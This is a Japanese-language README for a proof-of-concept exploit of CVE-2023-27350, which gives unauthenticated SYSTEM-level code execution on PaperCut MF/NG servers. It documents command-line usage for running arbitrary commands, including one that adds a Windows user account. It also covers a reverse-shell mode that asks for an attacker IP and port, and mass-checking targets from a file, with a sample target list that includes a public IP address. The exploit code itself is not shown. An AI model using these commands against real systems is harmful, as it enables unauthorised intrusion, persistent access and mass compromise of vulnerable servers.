
Papercut CVE-2023-27350 のエクスプロイト。 [+] リバースシェル [+] 一括チェック
これは、PaperCut MF/NG に見つかった脆弱性 CVE-2023-27350 の Proof of Concept (PoC) エクスプロイトです。この脆弱性により、認証されていない攻撃者が SYSTEM 権限で任意のコードを実行できます。
このエクスプロイトを使用する前に、以下のライブラリがインストールされていることを確認してください。
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u, --url: ターゲット PaperCut MF/NG アプリケーションの URL(例: http://target-ip:9191)。-c, --command: ターゲットシステム上で実行するコマンド。--reverse-shell: リバースシェルペイロードを使用して、ターゲットシステム上でコマンドを実行します。-f, --file: ファイルから複数のターゲットをチェックします(例: file.txt)。ターゲットシステム上でコマンドを実行するには、-c オプションを使用します:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
リバースシェルペイロードを使用してターゲットシステム上でコマンドを実行するには、--reverse-shell オプションを使用します。IP アドレスとポート番号の入力を求められます:
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>
ファイルから複数のターゲットをチェックするには、-f オプションを使用します。ファイルの形式は ip_address:port である必要があります:
python CVE-2023-27350.py -f file.txt
file.txt 入力でマスチェックオプションを使用する場合、ファイルの内容が正しくフォーマットされていることを確認してください。
ファイルの各行には、ターゲットの IP アドレスとポート番号をコロン : で区切って含める必要があります。例:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
IP アドレス、コロン、ポート番号の間に余分なスペースや文字がないことを確認してください。また、各行に IP アドレスとポート番号が 1 つだけ含まれていることを確認してください。
これは horizon3ai/CVE-2023-27350 リポジトリのフォークバージョンです。元のエクスプロイトのすべてのクレジットは作者に帰属します。